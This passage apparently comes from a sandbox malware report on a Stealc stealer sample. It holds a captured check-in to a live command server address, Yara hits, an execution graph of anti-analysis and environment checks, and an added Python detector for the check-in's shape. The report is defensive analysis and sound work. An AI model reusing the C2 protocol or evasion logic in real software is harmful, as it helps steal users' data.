    Data Raw: 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 39 43 39 34 31 35 34 36 39 36 39 36 36 30 36 35 39 30 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 2d 2d 0d 0a
    Data Ascii (209 bytes; the CRLF line endings are restored from the raw hex):
    ------GCFIIEBKEGHJJJJJJDAA
    Content-Disposition: form-data; name="hwid"

    3D9C9415469696606590
    ------GCFIIEBKEGHJJJJJJDAA
    Content-Disposition: form-data; name="build"

    puma
    ------GCFIIEBKEGHJJJJJJDAA--
Oct 26, 2024 23:15:08.696441889 CEST | 210 | IN
    HTTP/1.1 200 OK
    Date: Sat, 26 Oct 2024 21:15:08 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 8
    Keep-Alive: timeout=5, max=99
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Data Raw: 59 6d 78 76 59 32 73 3d
    Data Ascii: YmxvY2s= (base64 for the string "block")
Neither request carries a User-Agent header. The check-in consists of a bare GET / followed by a multipart POST with exactly two fields, the hardware id and the build name "puma"; the server's only answer is the base64 string "block", after which the sample makes no further request.
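The exchange above, worked through in Python as an added example (not the sample's code and not Joe Sandbox's). The request body, its headers and the reply are reconstructed byte for byte from the Data Raw hex of the capture; the parser splits the multipart body into its fields, the reply is base64-decoded, and is_stealc_checkin() encodes the shape this one capture shows (a POST without a User-Agent whose multipart body carries exactly an hwid and a build field, with a Content-Length that matches the body). That heuristic is this example's own rule, not the content of Suricata rule 2044243, which the report does not reproduce; what the server means by "block" is likewise not stated in the report.

```python
"""Decode the Stealc check-in captured above and flag its shape. Added example,
not the malware's or Joe Sandbox's code; the body, headers and reply below are
reconstructed from the report's Data Raw hex."""
from __future__ import annotations

import base64
import re

# Reconstructed from the capture: the 209-byte multipart body of POST /e2b1563c6670f193.php.
BOUNDARY = "----GCFIIEBKEGHJJJJJJDAA"
CAPTURED_BODY = (
    b"------GCFIIEBKEGHJJJJJJDAA\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"3D9C9415469696606590\r\n"
    b"------GCFIIEBKEGHJJJJJJDAA\r\n"
    b'Content-Disposition: form-data; name="build"\r\n\r\n'
    b"puma\r\n"
    b"------GCFIIEBKEGHJJJJJJDAA--\r\n"
)
CAPTURED_HEADERS = {  # exactly the headers sent; note that there is no User-Agent
    "Content-Type": "multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAA",
    "Host": "185.215.113.206",
    "Content-Length": "209",
    "Connection": "Keep-Alive",
    "Cache-Control": "no-cache",
}
CAPTURED_REPLY = bytes.fromhex("596d78765932733d")  # the server's 8-byte answer


def boundary_from_content_type(content_type: str) -> str | None:
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    return m.group(2) if m else None


def parse_multipart(body: bytes, boundary: str) -> dict[str, bytes]:
    """Minimal multipart/form-data parser: {field name: raw value}."""
    delim = b"--" + boundary.encode()
    fields: dict[str, bytes] = {}
    for part in body.split(delim)[1:]:
        if part.startswith(b"--"):  # closing delimiter "--boundary--"
            break
        head, _, value = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', head)
        if m:
            fields[m.group(1).decode()] = value.rstrip(b"\r\n")
    return fields


def is_stealc_checkin(method: str, headers: dict[str, str], body: bytes) -> bool:
    """The shape the capture shows: a POST with no User-Agent whose multipart body
    carries exactly an 'hwid' field (upper-case hex host id) and a 'build' field."""
    h = {k.lower(): v for k, v in headers.items()}
    if method.upper() != "POST" or "user-agent" in h:
        return False
    ctype = h.get("content-type", "")
    boundary = boundary_from_content_type(ctype)
    if boundary is None or not ctype.startswith("multipart/form-data"):
        return False
    if "content-length" in h and int(h["content-length"]) != len(body):
        return False
    fields = parse_multipart(body, boundary)
    return set(fields) == {"hwid", "build"} and re.fullmatch(rb"[0-9A-F]+", fields["hwid"]) is not None


def decode_c2_reply(reply: bytes) -> str:
    """The server answers in base64; the capture's 'YmxvY2s=' decodes to 'block'."""
    return base64.b64decode(reply, validate=True).decode("ascii")
```

The absence of a User-Agent is a weak signal on its own (plenty of tooling omits it); the two-field multipart body with a hex hwid and a short build name is what carries the detection, and a network sensor should pair it with the preceding empty GET / from the same source port.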


                                      Target ID:0
                                      Start time:17:15:03
                                      Start date:26/10/2024
                                      Path:C:\Users\user\Desktop\file.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                      Imagebase:0x910000
                                      File size:1'894'400 bytes
                                      MD5 hash:AA9612D185F329E0F4B0A9525DE3B0E1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1786322649.000000000069E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1745824943.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true


                                        Execution Graph

                                        Execution Coverage:8.2%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:10.1%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:24
execution_graph (graph rendering; the node dump is reduced here to the call chains it records, written as function address (APIs called) with → for edges)

Entry chain: 9269f0 → 912260, which calls 9145c0 (RtlAllocateHeap, VirtualProtect) over and over (912274 through 91268e) and then 929860.
API resolution: 929860 → 929750 (GetPEB) → 929a93 (LoadLibraryA ×5) → 929af4, 929b16, 929b4f, 929b71, 929b92 (GetProcAddress, seven calls in total) → 926a00 → 92a740 (lstrcpy at 92a77e) → 9111d0.
Environment checks, each with its own ExitProcess branch:
  9111d0 → 91120f ExitProcess, or 911217 → 911160 (GetSystemInfo) → 91117c ExitProcess, or 911184 →
  911110 (GetCurrentProcess, VirtualAllocExNuma) → 911141 ExitProcess, or 911149 →
  9110a0 (VirtualAlloc; VirtualFree at 9110e2) → 911220 → 9289b0 → 911233 (GlobalMemoryStatusEx) → 911249 (__aulldiv) → 911292 ExitProcess, or 91129a →
  926770 (GetUserDefaultLangID) → 926792 → ExitProcess at 9267a3, 9267ad, 9267b7, 9267c1 or 9267cb, or 9267d3 →
  911190 → 9278e0 (3 API calls) → 91119e → 927850 (3 API calls) → 9111b7 → 9111c4 ExitProcess, or 9111cc →
  927850 (GetProcessHeap, RtlAllocateHeap, GetUserNameA) → 926a30 → 9278e0 (GetProcessHeap, RtlAllocateHeap, GetComputerNameA) → 926a43.
String building helpers used throughout: 92a9b0 (lstrlen at 92a9c1; lstrcpy, lstrcat at 92a9fa; then 92a7a0 lstrcpy), 92a8a0 (lstrcpy at 92a8f9), 92a820 (lstrlen; lstrcpy at 92a87b), 926430 (lstrcpy ×4), 926820 (a chain of 92a740, 92a9b0, 92a8a0 and 92a7a0 calls).
Single-instance event: 926a43 → 926a64 … 926a80 → 926a89 → 926ac2 (OpenEventA); if the event exists, 926af5 (CloseHandle, Sleep) → 926b0a → back to 926a89; otherwise 926ad9 → 926ae1 (CreateEventA) → 926b0c.
Time check: 926b0c → 926920 (GetSystemTime) → 926820 → 92698e → 926998 (sscanf) → 92a800 → 9269aa (SystemTimeToFileTime ×2) → 9269e0 → 925b10, or 9269ce → 9269d8 ExitProcess.
Collection and C2 setup: 925b10 → 92a740 (lstrcpy) → 92a820 (×4) → 926430 → 92a820 (×4) → 9126a0, which again calls 9145c0 (RtlAllocateHeap, VirtualProtect) repeatedly (9126b4 through 912f97, where the dump is cut off) → 925cc3 → 926430 → 92a7a0 → 92a9b0/92a8a0 (×3) → 92a740 → 925d9e → 927500 (GetWindowsDirectoryA) → 92a7a0 → 914880 → 9217a0 → 92a740 → 911590 (lstrcpy) → 915960 (34 API calls) → 921050 → 92a740 → 911590 → 915960 → 920d90 → 92a740 → 911590 → 915960 → 920f40 → 911590 → 921a10 → 92a740 → 914fb0 (GetProcessHeap, RtlAllocateHeap, InternetOpenA) → 911590 → 920740 → 92a740 → 911590 → 915960 → 921170.
14062->14063 14064 9145c0 2 API calls 14063->14064 14065 912fb0 14064->14065 14066 9145c0 2 API calls 14065->14066 14067 912fc9 14066->14067 14068 9145c0 2 API calls 14067->14068 14069 912fe2 14068->14069 14070 9145c0 2 API calls 14069->14070 14071 912ffb 14070->14071 14072 9145c0 2 API calls 14071->14072 14073 913014 14072->14073 14074 9145c0 2 API calls 14073->14074 14075 91302d 14074->14075 14076 9145c0 2 API calls 14075->14076 14077 913046 14076->14077 14078 9145c0 2 API calls 14077->14078 14079 91305f 14078->14079 14080 9145c0 2 API calls 14079->14080 14081 913078 14080->14081 14082 9145c0 2 API calls 14081->14082 14083 913091 14082->14083 14084 9145c0 2 API calls 14083->14084 14085 9130aa 14084->14085 14086 9145c0 2 API calls 14085->14086 14087 9130c3 14086->14087 14088 9145c0 2 API calls 14087->14088 14089 9130dc 14088->14089 14090 9145c0 2 API calls 14089->14090 14091 9130f5 14090->14091 14092 9145c0 2 API calls 14091->14092 14093 91310e 14092->14093 14094 9145c0 2 API calls 14093->14094 14095 913127 14094->14095 14096 9145c0 2 API calls 14095->14096 14097 913140 14096->14097 14098 9145c0 2 API calls 14097->14098 14099 913159 14098->14099 14100 9145c0 2 API calls 14099->14100 14101 913172 14100->14101 14102 9145c0 2 API calls 14101->14102 14103 91318b 14102->14103 14104 9145c0 2 API calls 14103->14104 14105 9131a4 14104->14105 14106 9145c0 2 API calls 14105->14106 14107 9131bd 14106->14107 14108 9145c0 2 API calls 14107->14108 14109 9131d6 14108->14109 14110 9145c0 2 API calls 14109->14110 14111 9131ef 14110->14111 14112 9145c0 2 API calls 14111->14112 14113 913208 14112->14113 14114 9145c0 2 API calls 14113->14114 14115 913221 14114->14115 14116 9145c0 2 API calls 14115->14116 14117 91323a 14116->14117 14118 9145c0 2 API calls 14117->14118 14119 913253 14118->14119 14120 9145c0 2 API calls 14119->14120 14121 91326c 14120->14121 14122 9145c0 2 API calls 14121->14122 14123 913285 14122->14123 14124 9145c0 2 API calls 14123->14124 14125 91329e 14124->14125 
14126 9145c0 2 API calls 14125->14126 14127 9132b7 14126->14127 14128 9145c0 2 API calls 14127->14128 14129 9132d0 14128->14129 14130 9145c0 2 API calls 14129->14130 14131 9132e9 14130->14131 14132 9145c0 2 API calls 14131->14132 14133 913302 14132->14133 14134 9145c0 2 API calls 14133->14134 14135 91331b 14134->14135 14136 9145c0 2 API calls 14135->14136 14137 913334 14136->14137 14138 9145c0 2 API calls 14137->14138 14139 91334d 14138->14139 14140 9145c0 2 API calls 14139->14140 14141 913366 14140->14141 14142 9145c0 2 API calls 14141->14142 14143 91337f 14142->14143 14144 9145c0 2 API calls 14143->14144 14145 913398 14144->14145 14146 9145c0 2 API calls 14145->14146 14147 9133b1 14146->14147 14148 9145c0 2 API calls 14147->14148 14149 9133ca 14148->14149 14150 9145c0 2 API calls 14149->14150 14151 9133e3 14150->14151 14152 9145c0 2 API calls 14151->14152 14153 9133fc 14152->14153 14154 9145c0 2 API calls 14153->14154 14155 913415 14154->14155 14156 9145c0 2 API calls 14155->14156 14157 91342e 14156->14157 14158 9145c0 2 API calls 14157->14158 14159 913447 14158->14159 14160 9145c0 2 API calls 14159->14160 14161 913460 14160->14161 14162 9145c0 2 API calls 14161->14162 14163 913479 14162->14163 14164 9145c0 2 API calls 14163->14164 14165 913492 14164->14165 14166 9145c0 2 API calls 14165->14166 14167 9134ab 14166->14167 14168 9145c0 2 API calls 14167->14168 14169 9134c4 14168->14169 14170 9145c0 2 API calls 14169->14170 14171 9134dd 14170->14171 14172 9145c0 2 API calls 14171->14172 14173 9134f6 14172->14173 14174 9145c0 2 API calls 14173->14174 14175 91350f 14174->14175 14176 9145c0 2 API calls 14175->14176 14177 913528 14176->14177 14178 9145c0 2 API calls 14177->14178 14179 913541 14178->14179 14180 9145c0 2 API calls 14179->14180 14181 91355a 14180->14181 14182 9145c0 2 API calls 14181->14182 14183 913573 14182->14183 14184 9145c0 2 API calls 14183->14184 14185 91358c 14184->14185 14186 9145c0 2 API calls 14185->14186 14187 9135a5 14186->14187 14188 9145c0 2 
API calls 14187->14188 14189 9135be 14188->14189 14190 9145c0 2 API calls 14189->14190 14191 9135d7 14190->14191 14192 9145c0 2 API calls 14191->14192 14193 9135f0 14192->14193 14194 9145c0 2 API calls 14193->14194 14195 913609 14194->14195 14196 9145c0 2 API calls 14195->14196 14197 913622 14196->14197 14198 9145c0 2 API calls 14197->14198 14199 91363b 14198->14199 14200 9145c0 2 API calls 14199->14200 14201 913654 14200->14201 14202 9145c0 2 API calls 14201->14202 14203 91366d 14202->14203 14204 9145c0 2 API calls 14203->14204 14205 913686 14204->14205 14206 9145c0 2 API calls 14205->14206 14207 91369f 14206->14207 14208 9145c0 2 API calls 14207->14208 14209 9136b8 14208->14209 14210 9145c0 2 API calls 14209->14210 14211 9136d1 14210->14211 14212 9145c0 2 API calls 14211->14212 14213 9136ea 14212->14213 14214 9145c0 2 API calls 14213->14214 14215 913703 14214->14215 14216 9145c0 2 API calls 14215->14216 14217 91371c 14216->14217 14218 9145c0 2 API calls 14217->14218 14219 913735 14218->14219 14220 9145c0 2 API calls 14219->14220 14221 91374e 14220->14221 14222 9145c0 2 API calls 14221->14222 14223 913767 14222->14223 14224 9145c0 2 API calls 14223->14224 14225 913780 14224->14225 14226 9145c0 2 API calls 14225->14226 14227 913799 14226->14227 14228 9145c0 2 API calls 14227->14228 14229 9137b2 14228->14229 14230 9145c0 2 API calls 14229->14230 14231 9137cb 14230->14231 14232 9145c0 2 API calls 14231->14232 14233 9137e4 14232->14233 14234 9145c0 2 API calls 14233->14234 14235 9137fd 14234->14235 14236 9145c0 2 API calls 14235->14236 14237 913816 14236->14237 14238 9145c0 2 API calls 14237->14238 14239 91382f 14238->14239 14240 9145c0 2 API calls 14239->14240 14241 913848 14240->14241 14242 9145c0 2 API calls 14241->14242 14243 913861 14242->14243 14244 9145c0 2 API calls 14243->14244 14245 91387a 14244->14245 14246 9145c0 2 API calls 14245->14246 14247 913893 14246->14247 14248 9145c0 2 API calls 14247->14248 14249 9138ac 14248->14249 14250 9145c0 2 API calls 
14249->14250 14251 9138c5 14250->14251 14252 9145c0 2 API calls 14251->14252 14253 9138de 14252->14253 14254 9145c0 2 API calls 14253->14254 14255 9138f7 14254->14255 14256 9145c0 2 API calls 14255->14256 14257 913910 14256->14257 14258 9145c0 2 API calls 14257->14258 14259 913929 14258->14259 14260 9145c0 2 API calls 14259->14260 14261 913942 14260->14261 14262 9145c0 2 API calls 14261->14262 14263 91395b 14262->14263 14264 9145c0 2 API calls 14263->14264 14265 913974 14264->14265 14266 9145c0 2 API calls 14265->14266 14267 91398d 14266->14267 14268 9145c0 2 API calls 14267->14268 14269 9139a6 14268->14269 14270 9145c0 2 API calls 14269->14270 14271 9139bf 14270->14271 14272 9145c0 2 API calls 14271->14272 14273 9139d8 14272->14273 14274 9145c0 2 API calls 14273->14274 14275 9139f1 14274->14275 14276 9145c0 2 API calls 14275->14276 14277 913a0a 14276->14277 14278 9145c0 2 API calls 14277->14278 14279 913a23 14278->14279 14280 9145c0 2 API calls 14279->14280 14281 913a3c 14280->14281 14282 9145c0 2 API calls 14281->14282 14283 913a55 14282->14283 14284 9145c0 2 API calls 14283->14284 14285 913a6e 14284->14285 14286 9145c0 2 API calls 14285->14286 14287 913a87 14286->14287 14288 9145c0 2 API calls 14287->14288 14289 913aa0 14288->14289 14290 9145c0 2 API calls 14289->14290 14291 913ab9 14290->14291 14292 9145c0 2 API calls 14291->14292 14293 913ad2 14292->14293 14294 9145c0 2 API calls 14293->14294 14295 913aeb 14294->14295 14296 9145c0 2 API calls 14295->14296 14297 913b04 14296->14297 14298 9145c0 2 API calls 14297->14298 14299 913b1d 14298->14299 14300 9145c0 2 API calls 14299->14300 14301 913b36 14300->14301 14302 9145c0 2 API calls 14301->14302 14303 913b4f 14302->14303 14304 9145c0 2 API calls 14303->14304 14305 913b68 14304->14305 14306 9145c0 2 API calls 14305->14306 14307 913b81 14306->14307 14308 9145c0 2 API calls 14307->14308 14309 913b9a 14308->14309 14310 9145c0 2 API calls 14309->14310 14311 913bb3 14310->14311 14312 9145c0 2 API calls 14311->14312 
14313 913bcc 14312->14313 14314 9145c0 2 API calls 14313->14314 14315 913be5 14314->14315 14316 9145c0 2 API calls 14315->14316 14317 913bfe 14316->14317 14318 9145c0 2 API calls 14317->14318 14319 913c17 14318->14319 14320 9145c0 2 API calls 14319->14320 14321 913c30 14320->14321 14322 9145c0 2 API calls 14321->14322 14323 913c49 14322->14323 14324 9145c0 2 API calls 14323->14324 14325 913c62 14324->14325 14326 9145c0 2 API calls 14325->14326 14327 913c7b 14326->14327 14328 9145c0 2 API calls 14327->14328 14329 913c94 14328->14329 14330 9145c0 2 API calls 14329->14330 14331 913cad 14330->14331 14332 9145c0 2 API calls 14331->14332 14333 913cc6 14332->14333 14334 9145c0 2 API calls 14333->14334 14335 913cdf 14334->14335 14336 9145c0 2 API calls 14335->14336 14337 913cf8 14336->14337 14338 9145c0 2 API calls 14337->14338 14339 913d11 14338->14339 14340 9145c0 2 API calls 14339->14340 14341 913d2a 14340->14341 14342 9145c0 2 API calls 14341->14342 14343 913d43 14342->14343 14344 9145c0 2 API calls 14343->14344 14345 913d5c 14344->14345 14346 9145c0 2 API calls 14345->14346 14347 913d75 14346->14347 14348 9145c0 2 API calls 14347->14348 14349 913d8e 14348->14349 14350 9145c0 2 API calls 14349->14350 14351 913da7 14350->14351 14352 9145c0 2 API calls 14351->14352 14353 913dc0 14352->14353 14354 9145c0 2 API calls 14353->14354 14355 913dd9 14354->14355 14356 9145c0 2 API calls 14355->14356 14357 913df2 14356->14357 14358 9145c0 2 API calls 14357->14358 14359 913e0b 14358->14359 14360 9145c0 2 API calls 14359->14360 14361 913e24 14360->14361 14362 9145c0 2 API calls 14361->14362 14363 913e3d 14362->14363 14364 9145c0 2 API calls 14363->14364 14365 913e56 14364->14365 14366 9145c0 2 API calls 14365->14366 14367 913e6f 14366->14367 14368 9145c0 2 API calls 14367->14368 14369 913e88 14368->14369 14370 9145c0 2 API calls 14369->14370 14371 913ea1 14370->14371 14372 9145c0 2 API calls 14371->14372 14373 913eba 14372->14373 14374 9145c0 2 API calls 14373->14374 14375 913ed3 
14374->14375 14376 9145c0 2 API calls 14375->14376 14377 913eec 14376->14377 14378 9145c0 2 API calls 14377->14378 14379 913f05 14378->14379 14380 9145c0 2 API calls 14379->14380 14381 913f1e 14380->14381 14382 9145c0 2 API calls 14381->14382 14383 913f37 14382->14383 14384 9145c0 2 API calls 14383->14384 14385 913f50 14384->14385 14386 9145c0 2 API calls 14385->14386 14387 913f69 14386->14387 14388 9145c0 2 API calls 14387->14388 14389 913f82 14388->14389 14390 9145c0 2 API calls 14389->14390 14391 913f9b 14390->14391 14392 9145c0 2 API calls 14391->14392 14393 913fb4 14392->14393 14394 9145c0 2 API calls 14393->14394 14395 913fcd 14394->14395 14396 9145c0 2 API calls 14395->14396 14397 913fe6 14396->14397 14398 9145c0 2 API calls 14397->14398 14399 913fff 14398->14399 14400 9145c0 2 API calls 14399->14400 14401 914018 14400->14401 14402 9145c0 2 API calls 14401->14402 14403 914031 14402->14403 14404 9145c0 2 API calls 14403->14404 14405 91404a 14404->14405 14406 9145c0 2 API calls 14405->14406 14407 914063 14406->14407 14408 9145c0 2 API calls 14407->14408 14409 91407c 14408->14409 14410 9145c0 2 API calls 14409->14410 14411 914095 14410->14411 14412 9145c0 2 API calls 14411->14412 14413 9140ae 14412->14413 14414 9145c0 2 API calls 14413->14414 14415 9140c7 14414->14415 14416 9145c0 2 API calls 14415->14416 14417 9140e0 14416->14417 14418 9145c0 2 API calls 14417->14418 14419 9140f9 14418->14419 14420 9145c0 2 API calls 14419->14420 14421 914112 14420->14421 14422 9145c0 2 API calls 14421->14422 14423 91412b 14422->14423 14424 9145c0 2 API calls 14423->14424 14425 914144 14424->14425 14426 9145c0 2 API calls 14425->14426 14427 91415d 14426->14427 14428 9145c0 2 API calls 14427->14428 14429 914176 14428->14429 14430 9145c0 2 API calls 14429->14430 14431 91418f 14430->14431 14432 9145c0 2 API calls 14431->14432 14433 9141a8 14432->14433 14434 9145c0 2 API calls 14433->14434 14435 9141c1 14434->14435 14436 9145c0 2 API calls 14435->14436 14437 9141da 14436->14437 
14438 9145c0 2 API calls 14437->14438 14439 9141f3 14438->14439 14440 9145c0 2 API calls 14439->14440 14441 91420c 14440->14441 14442 9145c0 2 API calls 14441->14442 14443 914225 14442->14443 14444 9145c0 2 API calls 14443->14444 14445 91423e 14444->14445 14446 9145c0 2 API calls 14445->14446 14447 914257 14446->14447 14448 9145c0 2 API calls 14447->14448 14449 914270 14448->14449 14450 9145c0 2 API calls 14449->14450 14451 914289 14450->14451 14452 9145c0 2 API calls 14451->14452 14453 9142a2 14452->14453 14454 9145c0 2 API calls 14453->14454 14455 9142bb 14454->14455 14456 9145c0 2 API calls 14455->14456 14457 9142d4 14456->14457 14458 9145c0 2 API calls 14457->14458 14459 9142ed 14458->14459 14460 9145c0 2 API calls 14459->14460 14461 914306 14460->14461 14462 9145c0 2 API calls 14461->14462 14463 91431f 14462->14463 14464 9145c0 2 API calls 14463->14464 14465 914338 14464->14465 14466 9145c0 2 API calls 14465->14466 14467 914351 14466->14467 14468 9145c0 2 API calls 14467->14468 14469 91436a 14468->14469 14470 9145c0 2 API calls 14469->14470 14471 914383 14470->14471 14472 9145c0 2 API calls 14471->14472 14473 91439c 14472->14473 14474 9145c0 2 API calls 14473->14474 14475 9143b5 14474->14475 14476 9145c0 2 API calls 14475->14476 14477 9143ce 14476->14477 14478 9145c0 2 API calls 14477->14478 14479 9143e7 14478->14479 14480 9145c0 2 API calls 14479->14480 14481 914400 14480->14481 14482 9145c0 2 API calls 14481->14482 14483 914419 14482->14483 14484 9145c0 2 API calls 14483->14484 14485 914432 14484->14485 14486 9145c0 2 API calls 14485->14486 14487 91444b 14486->14487 14488 9145c0 2 API calls 14487->14488 14489 914464 14488->14489 14490 9145c0 2 API calls 14489->14490 14491 91447d 14490->14491 14492 9145c0 2 API calls 14491->14492 14493 914496 14492->14493 14494 9145c0 2 API calls 14493->14494 14495 9144af 14494->14495 14496 9145c0 2 API calls 14495->14496 14497 9144c8 14496->14497 14498 9145c0 2 API calls 14497->14498 14499 9144e1 14498->14499 14500 9145c0 2 
API calls 14499->14500 14501 9144fa 14500->14501 14502 9145c0 2 API calls 14501->14502 14503 914513 14502->14503 14504 9145c0 2 API calls 14503->14504 14505 91452c 14504->14505 14506 9145c0 2 API calls 14505->14506 14507 914545 14506->14507 14508 9145c0 2 API calls 14507->14508 14509 91455e 14508->14509 14510 9145c0 2 API calls 14509->14510 14511 914577 14510->14511 14512 9145c0 2 API calls 14511->14512 14513 914590 14512->14513 14514 9145c0 2 API calls 14513->14514 14515 9145a9 14514->14515 14516 929c10 14515->14516 14517 929c20 43 API calls 14516->14517 14518 92a036 8 API calls 14516->14518 14517->14518 14519 92a146 14518->14519 14520 92a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14518->14520 14521 92a153 8 API calls 14519->14521 14522 92a216 14519->14522 14520->14519 14521->14522 14523 92a298 14522->14523 14524 92a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14522->14524 14525 92a337 14523->14525 14526 92a2a5 6 API calls 14523->14526 14524->14523 14527 92a344 9 API calls 14525->14527 14528 92a41f 14525->14528 14526->14525 14527->14528 14529 92a4a2 14528->14529 14530 92a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14528->14530 14531 92a4ab GetProcAddress GetProcAddress 14529->14531 14532 92a4dc 14529->14532 14530->14529 14531->14532 14533 92a515 14532->14533 14534 92a4e5 GetProcAddress GetProcAddress 14532->14534 14535 92a612 14533->14535 14536 92a522 10 API calls 14533->14536 14534->14533 14537 92a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14535->14537 14538 92a67d 14535->14538 14536->14535 14537->14538 14539 92a686 GetProcAddress 14538->14539 14540 92a69e 14538->14540 14539->14540 14541 92a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14540->14541 14542 925ca3 14540->14542 14541->14542 14543 911590 14542->14543 15664 911670 14543->15664 14546 92a7a0 lstrcpy 14547 9115b5 14546->14547 14548 92a7a0 lstrcpy 14547->14548 
14549 9115c7 14548->14549 14550 92a7a0 lstrcpy 14549->14550 14551 9115d9 14550->14551 14552 92a7a0 lstrcpy 14551->14552 14553 911663 14552->14553 14554 925510 14553->14554 14555 925521 14554->14555 14556 92a820 2 API calls 14555->14556 14557 92552e 14556->14557 14558 92a820 2 API calls 14557->14558 14559 92553b 14558->14559 14560 92a820 2 API calls 14559->14560 14561 925548 14560->14561 14562 92a740 lstrcpy 14561->14562 14563 925555 14562->14563 14564 92a740 lstrcpy 14563->14564 14565 925562 14564->14565 14566 92a740 lstrcpy 14565->14566 14567 92556f 14566->14567 14568 92a740 lstrcpy 14567->14568 14601 92557c 14568->14601 14569 925643 StrCmpCA 14569->14601 14570 9256a0 StrCmpCA 14571 9257dc 14570->14571 14570->14601 14572 92a8a0 lstrcpy 14571->14572 14573 9257e8 14572->14573 14574 92a820 2 API calls 14573->14574 14576 9257f6 14574->14576 14575 92a820 lstrlen lstrcpy 14575->14601 14578 92a820 2 API calls 14576->14578 14577 925856 StrCmpCA 14579 925991 14577->14579 14577->14601 14583 925805 14578->14583 14582 92a8a0 lstrcpy 14579->14582 14580 92a740 lstrcpy 14580->14601 14581 92a7a0 lstrcpy 14581->14601 14584 92599d 14582->14584 14585 911670 lstrcpy 14583->14585 14587 92a820 2 API calls 14584->14587 14597 925811 14585->14597 14586 911590 lstrcpy 14586->14601 14588 9259ab 14587->14588 14592 92a820 2 API calls 14588->14592 14589 925a0b StrCmpCA 14593 925a16 Sleep 14589->14593 14594 925a28 14589->14594 14590 9252c0 25 API calls 14590->14601 14591 9251f0 20 API calls 14591->14601 14595 9259ba 14592->14595 14593->14601 14596 92a8a0 lstrcpy 14594->14596 14599 911670 lstrcpy 14595->14599 14600 925a34 14596->14600 14597->13661 14598 92a8a0 lstrcpy 14598->14601 14599->14597 14602 92a820 2 API calls 14600->14602 14601->14569 14601->14570 14601->14575 14601->14577 14601->14580 14601->14581 14601->14586 14601->14589 14601->14590 14601->14591 14601->14598 14605 92578a StrCmpCA 14601->14605 14608 92593f StrCmpCA 14601->14608 14603 925a43 14602->14603 14604 92a820 2 API calls 
14603->14604 14606 925a52 14604->14606 14605->14601 14607 911670 lstrcpy 14606->14607 14607->14597 14608->14601 14610 927553 GetVolumeInformationA 14609->14610 14611 92754c 14609->14611 14612 927591 14610->14612 14611->14610 14613 9275fc GetProcessHeap RtlAllocateHeap 14612->14613 14614 927628 wsprintfA 14613->14614 14615 927619 14613->14615 14616 92a740 lstrcpy 14614->14616 14617 92a740 lstrcpy 14615->14617 14618 925da7 14616->14618 14617->14618 14618->13682 14620 92a7a0 lstrcpy 14619->14620 14621 914899 14620->14621 15673 9147b0 14621->15673 14623 9148a5 14624 92a740 lstrcpy 14623->14624 14625 9148d7 14624->14625 14626 92a740 lstrcpy 14625->14626 14627 9148e4 14626->14627 14628 92a740 lstrcpy 14627->14628 14629 9148f1 14628->14629 14630 92a740 lstrcpy 14629->14630 14631 9148fe 14630->14631 14632 92a740 lstrcpy 14631->14632 14633 91490b InternetOpenA StrCmpCA 14632->14633 14634 914944 14633->14634 14635 914ecb InternetCloseHandle 14634->14635 15679 928b60 14634->15679 14637 914ee8 14635->14637 15694 919ac0 CryptStringToBinaryA 14637->15694 14638 914963 15687 92a920 14638->15687 14641 914976 14643 92a8a0 lstrcpy 14641->14643 14648 91497f 14643->14648 14644 92a820 2 API calls 14645 914f05 14644->14645 14647 92a9b0 4 API calls 14645->14647 14646 914f27 codecvt 14650 92a7a0 lstrcpy 14646->14650 14649 914f1b 14647->14649 14652 92a9b0 4 API calls 14648->14652 14651 92a8a0 lstrcpy 14649->14651 14663 914f57 14650->14663 14651->14646 14653 9149a9 14652->14653 14654 92a8a0 lstrcpy 14653->14654 14655 9149b2 14654->14655 14656 92a9b0 4 API calls 14655->14656 14657 9149d1 14656->14657 14658 92a8a0 lstrcpy 14657->14658 14659 9149da 14658->14659 14660 92a920 3 API calls 14659->14660 14661 9149f8 14660->14661 14662 92a8a0 lstrcpy 14661->14662 14664 914a01 14662->14664 14663->13685 14665 92a9b0 4 API calls 14664->14665 14666 914a20 14665->14666 14667 92a8a0 lstrcpy 14666->14667 14668 914a29 14667->14668 14669 92a9b0 4 API calls 14668->14669 14670 914a48 14669->14670 14671 92a8a0 
